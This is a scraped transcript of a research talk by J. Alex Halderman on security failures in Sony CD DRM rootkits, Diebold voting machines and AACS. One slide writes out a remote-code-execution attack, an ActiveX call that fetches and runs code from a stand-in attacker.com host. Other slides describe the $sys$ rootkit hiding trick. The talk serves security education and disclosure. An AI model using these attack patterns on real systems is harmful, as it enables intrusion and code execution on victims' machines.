1 / 58

Lessons from Security Failures In Nontraditional Computing Environments

Lessons from Security Failures In Nontraditional Computing Environments. J. Alex Halderman. CSS 1999. SDMI 2001. CD DRM 2003, 2005. AACS 2007. Diebold 2003, 2006. What’s the common “thread”?. Problem. Platform. Package. Nontraditional Environments. Security Intuition.

diza
Download Presentation

Lessons from Security Failures In Nontraditional Computing Environments

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Lessons from Security Failures In Nontraditional Computing Environments J. Alex Halderman

  2. CSS 1999 SDMI 2001 CD DRM 2003, 2005 AACS 2007 Diebold 2003, 2006 What’s the common “thread”?

  3. Problem Platform Package Nontraditional Environments

  4. Security Intuition Security Intuition Breakdown Underestimate Similarity Underestimate Difference Underestimate Risk

  5. Spectacular Failures Cascading Irreparable Collateral damage

  6. Nontraditional Environments Intuition Breakdowns Spectacular Failures

  7. Disaster Investigation

  8. Questions • What about these environments makes failures especially severe? • Are there patterns to the design and implementation mistakes behind them? • Where are such failures likely to occur in the future? • What tools and techniques can we use to prevent them?

  9. Outline • A Model for Security Failures • Failures in CD-DRM Systems • Failures in E-Voting Systems • Predicting Future Disasters • Remedies and Defensive Strategies

  10. CD DRM 2001 1st Generation: Passive protection 2003 2nd Generation: Active protection 2005 3rd Generation: Weak passive + Aggressive active [H02] [H03] [HF05]

  11. Nontraditional Problem Restrict use (Untrusted device) All DRM: No known solution providestraditional security guarantees Compatibility (Legacy format)

  12. Nontraditional Package   Ripper/copier Application Protectiondriver Protectiondriver Audio CD Hybrid CD Drivers OS Autorun CD Marked “Protected” Normal CD #

  13. A Spectacular Failure Failure in depthInstaller → Patch → Uninstaller Mass exposureMillions of computers vulnerable Difficult repairsMost users unaware they’re at risk High costsLawsuits, recalls, lost sales

  14. First4Internet SunnComm “Light years beyond encryption™” 52 titles4.7 million discs 37 titles20 million discs

  15. Rootkit [HF06] DRM challenge: Users will remove protection driver Vendor response: Install a rootkit to hide it Magic prefix: $sys$ Files Processes Registry keys Hidden

  16. Rootkit [HF06] DRM challenge: Users will remove protection driver Exploits in wild Backdoor.Ryknos.B Trojan.Welomoch Vendor response: Install a rootkit to hide it Mistake: Hides arbitrary objects Attack: Privilege escalation $sys$virus.exe

  17. Everyone:Full Control Installer DRM challenge: Users will decline to install software Vendor response: Install regardless of consent Mistake: Incorrect permissions Attack: Privilege escalation M Runs with administrator privilegesnext time CD is inserted 13+ MB installed before EULA screen

  18. Installer DRM challenge: Users will decline to install software Sony releases patch…but, patch calls potentially booby trapped code [HF06] How do users know they need to patch? Vulnerable even if refused installation Vendor response: Install regardless of consent Mistake: Incorrect permissions Attack: Privilege escalation M

  19. Uninstallers [HF06] DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access 1. User obtains single-use code for uninstallation web page 2. Web page calls ActiveX control CodeSupport.Uninstall(“http://www.sony-bmg.com/XCP.dat”) 3. Client CodeSupport.ocx “HTTP GET /XCP.dat” Server sony-bmg.com XCP.dat 4. Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp()

  20. “Oops! ... I did it again” Uninstallers [HF06] DRM challenge: Angry customers demand removal Vendor response: Offer uninstallers, but limit access Mistakes: Control accepts arbitrary URL Remote code not authenticated Control not removed after use Rookie mistakes Attack: Remote code execution 1. Victim visits attacker’s web page CodeSupport.Uninstall(“http://www.attacker.com/Evil.dat”) 2. Client CodeSupport.ocx “HTTP GET /XCP.dat” “HTTP GET /Evil.dat” Server sony-bmg.com Server attacker.com XCP.dat Evil.dat 3. Client executes code from Evil.dat with user’s privileges

  21. Environmental Effects Technology phase changeRisks appear unexpectedly DRM problem → inherent conflictDeliberately subvert control of PC Lack of transparencyProblems more difficult to detect Conflicting incentivesChoose risky DRM over user security Politics

  22. Nearly all parties underestimated security risks: Intuition Breakdown Vendors Vendors Destroyed by rookie security mistakes “Most people, I think, don't even know what a Rootkit is, so why should they care about it?”— Thomas HessePresident, Sony BMG Global Digital Business Sony Sony Users Users Didn’t know music CDs could hurt them Experts Experts Didn’t discover rootkit for six months

  23. Outline • A Model for Security Failures • Failures in CD-DRM Systems • Failures in E-Voting Systems • Predicting Future Disasters • Remedies and Defensive Strategies

  24. Diebold DREs

  25. Nontraditional Package

  26. Nontraditional Platform

  27. Nontraditional Problem Voting…Securely Secretly Accessibly Quickly Cheaply Paperless DREs: No known solutionprovides traditional security guarantees

  28. A Spectacular Failure Failures in depth Code insertion routes, physical security Mass exposure Millions of votes at risk Difficult repairs Some attacks not patchable High costsMany states likely to replace machines

  29. Inserting Code [FHF07] BallotStation BallotStation (Internal Flash) FBOOT.NB0 NK.BIN INSTALL.INS EXPLORER.GLB WinCE Kernel WinCE Kernel (Internal Flash) Bootloader Bootloader (Internal Flash or EPROM)

  30. Inserting Code [FHF07] Failure in Depth: Boot into Explorer Insecure firmware updater ROM replacement BallotStation WinCE Kernel Bootloader (Flash)

  31. Stealing Votes [FHF07] BallotStation Stuffer WinCE Kernel

  32. Stealing Votes [FHF07] Primary Vote Record Primary Vote Record Backup Vote Record Backup Vote Record Audit Log Audit Log BallotStation Stuffer Kernel

  33. Viral Propagation [FHF07] Reboot

  34. [FHF07]

  35. Physical Security [FHF07]

  36. Physical Security [FHF07] Failure in Depth: Same key used everywhere Widely available Secret disclosedon web site Lock easy to pick

  37. Environmental Effects Technology phase changeRisks appear unexpectedly Difficulty of the problemConfusing threat model, circular reasoning Lack of transparencyBasic errors persist for yearsSecurity treated as a PR problem Conflicting incentivesOfficials choose efficiency over security Politics

  38. Nearly all parties underestimated security risks: Intuition Breakdown Vendor Vendor Planned security by obscurityVastly underinvested in security design Officials Officials Underestimated similarity to PCsDidn’t understand threat model CAs CAs Lacked institutional competence to see risks Experts Experts Many surprised by severity of problems

  39. Outline • A Model for Security Failures • Failures in CD-DRM Systems • Failures in E-Voting Systems • Predicting Future Disasters • Remedies and Defensive Strategies

  40. Learning from Failures My Past WorkCD DRME-Voting Work in ProgressAACSOther voting systems Related WorkPast Voting StudiesCSS, SDMI, HDCP, DTVWEP, GSM, RFID Future Work(Predicted failures)

  41. Title Key Title Key Volume Key Volume Key Processing Key Processing Key Device Key Device Key AACS [Work in progress] Potential disaster (analyze game theory) January 12 Solid crypto, Rookie coding errors January 13 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bd09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 be09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 bf ? 09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c109 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c209 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c3 February 11 DRM as nontraditional security problem February 24 Interesting lessons on incentives, politics, law Revokable Arms Race

  42. Other Voting Systems [Work in progress]

  43. Predicting Failures NontraditionalEnvironment + TechnologyPhase Change +

  44. Future Failures?

  45. Future Failures?

  46. Future Failures?

  47. Future Failures?

  48. Outline • A Model for Security Failures • Failures in CD-DRM Systems • Failures in E-Voting Systems • Predicting Future Disasters • Remedies and Defensive Strategies

  49. Defensive Approach New Intuitions New Technologies New Policies

  50. General Lessons Security disasters occur where security research isn’t involved New intuitions, partnerships, transparency Problems that resist rigorous security analysis are prone to major failures Research ways to transform problems Failures have higher externalities where producer and user incentives misalign Where appropriate, add liability

More Related